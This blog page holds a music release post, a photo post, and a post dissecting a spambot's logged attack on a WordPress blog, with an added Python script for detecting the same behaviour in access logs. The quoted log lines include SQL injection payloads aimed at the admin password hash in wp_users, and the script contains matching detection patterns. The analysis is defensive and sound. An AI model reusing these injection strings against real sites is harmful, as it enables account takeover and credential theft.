electro acoustic expressionism
nodepet
November 14th, 2008

[pc1108-01] night drone – drifts 1-4

Filed under: Music — olliver @ 23:18 h

[Image: Night Drone - Drifts 1-4 front cover]

It was about time for another Petcord release and really high time for the first release not by Giorgos or me (Petcord goes public, widening its scope – giving in to peer pressure ;-)). Steven Deacid from Cologne performs as Night Drone his Drifts 1-4 series. Apart from doing the cover artwork, I also contributed a reconstruction of Drift 2, which does not exactly sound like the rest of the tunes and is therefore easy to spot ;-).

Perhaps a few words about what can be expected:

Drifts 1-4 marks the beginning of a series of pieces that focus on deep saturated timbres and sustained tones blending into one another. Sparsely arranged and yet successfully managing to escape monotony by constantly changing sound characteristics, an approach well known from Minimalist music. Drifts 1-4 prioritises the creation of a cinematic vision, a constant stream of floating association freely defined by the listener.

And more specifically:

[Drifts 1-4] takes analogue synth sounds characteristic of '90s IDM electronica, but uses them within a Dark Ambient inspired context without any percussive elements. Because of this crossover, floating tones see constant modulation, addition and subtraction of overtones, as well as more distinct thematic progression. Due to sparse arrangements, Night Drone is capable of reaching clarity in blending tones and approaches sci-fi soundtrack quality, where others get lost in mushy reverberation and awkward sound clusters.

source: Petcord liner notes

The release has a bit of a longer history, too: Originally planned for October, we had the idea of adding “demix” versions. One by me and another by Giorgos. Giorgos, however, was not able to complete the tune in time, so it was omitted. As a result of some discussions, the project name and the entire scope of the music changed and so did the cover artwork. But nothing that prevented the release from finally happening ;-)


November 13th, 2008

failed blogspam automation from China

Filed under: Spam — olliver @ 23:31 h

An exceptionally dumb spambot from China visited my blog and tried to exploit several WordPress vulnerabilities that might have worked once with ancient versions. Let me split its traces into several parts:

1. Checking for a no longer existing article and not quite understanding the difference between mod_rewrite fake directories and actual directories. Maybe this script was optimised for blogs that run WordPress in its stock query string mode (which is brief but not really the most you can get from your blog search-engine-wise):

58.241.255.38 - - [13/Nov/2008:21:28:15 +0100] "HEAD /using-bbclone-with-wordpress-232-the-almost-easy-way/wp-admin/index.php HTTP/1.1" 404 - "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
58.241.255.38 - - [13/Nov/2008:21:28:16 +0100] "GET /using-bbclone-with-wordpress-232-the-almost-easy-way/ HTTP/1.1" 404 6045 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"

I’m seeing this quite often and usually this is all that will happen. But not this time…

2. Trying to mess around in the admin section and not figuring out that I restricted access to my own IP address ranges. Obviously the script has no handler for 403 responses and thus keeps on trying something which isn’t going to work…

58.241.255.38 - - [13/Nov/2008:21:28:18 +0100] "HEAD /wp-login.php?action=logout HTTP/1.1" 302 - "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
58.241.255.38 - - [13/Nov/2008:21:28:19 +0100] "HEAD /wp-admin/theme-editor.php HTTP/1.1" 403 - "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
58.241.255.38 - - [13/Nov/2008:21:28:20 +0100] "HEAD /wp-login.php?action=logout HTTP/1.1" 302 - "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
58.241.255.38 - - [13/Nov/2008:21:28:21 +0100] "HEAD /wp-admin/theme-editor.php HTTP/1.1" 403 - "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
58.241.255.38 - - [13/Nov/2008:21:28:22 +0100] "HEAD /wp-login.php?action=logout HTTP/1.1" 302 - "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
58.241.255.38 - - [13/Nov/2008:21:28:23 +0100] "HEAD /wp-admin/theme-editor.php HTTP/1.1" 403 - "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
58.241.255.38 - - [13/Nov/2008:21:28:24 +0100] "HEAD /wp-login.php?action=logout HTTP/1.1" 302 - "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
58.241.255.38 - - [13/Nov/2008:21:28:25 +0100] "HEAD /wp-admin/theme-editor.php HTTP/1.1" 403 - "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"

This silliness went on like this for a minute, apparently trying to exploit a long-fixed vulnerability in WordPress’ admin section.

3. Next follows another try at exploiting an old security hole in the admin section (still not getting that access is forbidden…) before the script finally resorts to plugging trackback spam, which isn’t working either :-). Most people have turned off this feature in the interim, because spammers rendered this feature entirely useless and there are alternative means to learn about one’s backlinks.

58.241.255.38 - - [13/Nov/2008:21:29:11 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 225 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
58.241.255.38 - - [13/Nov/2008:21:29:12 +0100] "GET /xmlrpc.php HTTP/1.1" 200 42 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
58.241.255.38 - - [13/Nov/2008:21:29:13 +0100] "POST /xmlrpc.php HTTP/1.1" 200 774 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
58.241.255.38 - - [13/Nov/2008:21:29:14 +0100] "POST /wp-trackback.php?tb_id=1 HTTP/1.1" 200 135 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"

4. Attempts at an SQL injection

58.241.255.38 - - [13/Nov/2008:21:29:16 +0100] "GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1" 301 - "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
58.241.255.38 - - [13/Nov/2008:21:29:17 +0100] "GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1" 301 - "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"

This has already been fixed for a while and is designed to compromise the admin account (user id=1). Spammers use this for adding or modifying content on a compromised site which then will be spamvertised via blogspam or, if the site attracts enough traffic, for running exploits via inserted iframes.

5. Looking for non-existing trackbacks

58.241.255.38 - - [13/Nov/2008:21:29:18 +0100] "GET /wp-trackback.php?p=1 HTTP/1.1" 200 135 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
58.241.255.38 - - [13/Nov/2008:21:29:19 +0100] "GET /wp-trackback.php?p=2 HTTP/1.1" 200 135 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
58.241.255.38 - - [13/Nov/2008:21:29:20 +0100] "GET /wp-trackback.php?p=3 HTTP/1.1" 200 135 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
58.241.255.38 - - [13/Nov/2008:21:29:21 +0100] "GET /wp-trackback.php?p=4 HTTP/1.1" 200 135 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
58.241.255.38 - - [13/Nov/2008:21:29:23 +0100] "GET /wp-trackback.php?p=5 HTTP/1.1" 200 135 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"

This went on till “p” reached the value 25 and was entirely useless because even if trackbacks were enabled, the request was malformed (lacking an id).

6. Repeating trackback spam attempts that didn’t work out before…

58.241.255.38 - - [13/Nov/2008:21:29:48 +0100] "GET /xmlrpc.php HTTP/1.1" 200 42 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
58.241.255.38 - - [13/Nov/2008:21:29:50 +0100] "POST /xmlrpc.php HTTP/1.1" 200 473 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"

The host 58.241.255.38 is located in China and looks like a compromised machine nobody bothers to fix:
http://www.google.com/search?q=58.241.255.38

route:        58.240.0.0/15
origin:       AS4837
descr:        CHINA169-BACKBONE CNCGROUP China169 Backbone
lastupd-frst: 2008-05-19 12:06Z  202.249.2.169@rrc06
lastupd-last: 2008-11-13 13:38Z  193.232.244.111@rrc13
seen-at:      rrc00,rrc01,rrc03,rrc04,rrc05,rrc06,rrc07,rrc10,rrc11,rrc12,rrc13,
              rrc14,rrc15,rrc16
num-rispeers: 113
source:       RISWHOIS

The script itself, as indicated by its user agent and modus operandi, has been seen for a while on different occasions:
http://www.google.com/search?q=k1b+compatible%3B+rss+6.0%3B+Windows+Sot+5.1+Security+Kol

Blocking the user agent via SetEnvIf/Rewrite rules should already take care of the problem. Additionally, firewalling or denying access for this unmaintained machine may be a good idea, too.
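
To find the same script in your own logs, the traits picked apart above can be checked mechanically. The following is an added example, not part of the original post: it assumes a raw Apache combined-format access log with plain ASCII quotes, and the function names, finding labels, thresholds and sample lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus
# Apache combined log format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')
UA_SIG = "k1b compatible; rss 6.0"   # user-agent fragment from the post
SQLI_RE = re.compile(r"union\s+select", re.I)
TB_RE = re.compile(r"^/wp-trackback\.php\?p=(\d+)$")

def decode(url, rounds=3):
    """URL-decode several times so double-encoded input (%2527 -> %27 -> ') is unwrapped."""
    for _ in range(rounds):
        url = unquote_plus(url)
    return url

def analyse(lines, min_repeat=3):
    """Return {ip: set of findings} for the behaviours described in the post."""
    findings, forbidden, tb_ids = defaultdict(set), defaultdict(int), defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # not a combined-format line
        ip, url = m["ip"], m["url"]
        if UA_SIG in m["ua"]:
            findings[ip].add("bot-user-agent")
        if SQLI_RE.search(decode(url)):
            findings[ip].add("sqli-probe")
        if m["status"] == "403" and url.startswith("/wp-admin/"):
            forbidden[ip, url] += 1       # same forbidden URL requested again
            if forbidden[ip, url] >= min_repeat:
                findings[ip].add("ignores-403")
        tb = TB_RE.match(url)
        if tb:
            tb_ids[ip].append(int(tb.group(1)))
            ids = tb_ids[ip][-min_repeat:]
            if len(ids) == min_repeat and all(b - a == 1 for a, b in zip(ids, ids[1:])):
                findings[ip].add("trackback-enumeration")
    return dict(findings)

# Constructed sample in the post's log format (192.0.2.10 is a made-up benign client).
UA = "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
def _line(ip, req, status, ua=UA):
    return f'{ip} - - [13/Nov/2008:21:28:19 +0100] "{req} HTTP/1.1" {status} - "-" "{ua}"'
SAMPLE = ([_line("58.241.255.38", "HEAD /wp-admin/theme-editor.php", 403)] * 3
          + [_line("58.241.255.38", f"GET /wp-trackback.php?p={n}", 200) for n in (1, 2, 3)]
          + [_line("58.241.255.38", "GET /index.php?cat=%2527+UNION+SELECT+1", 301),
             _line("192.0.2.10", "GET /index.php?cat=3", 200, "Mozilla/5.0")])
```

Calling `analyse(open("access.log"))` on a real log returns one set of findings per client address; the behavioural checks still fire if the script changes its user agent.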


November 4th, 2008

Photo retrospect second quarter of 2008

Filed under: Photo — olliver @ 12:16 h

I’m lagging behind with my photo posts, so here comes the photographic retrospect for the second quarter of the year:

lit doorway   hanging twigs   tomb with ivy

lament   rails and contre jour   Agava in front of chapel

chasing shadows   rails and contre jour II   rails and contre jour III

View towards hills   roofs   entrance and contre jour
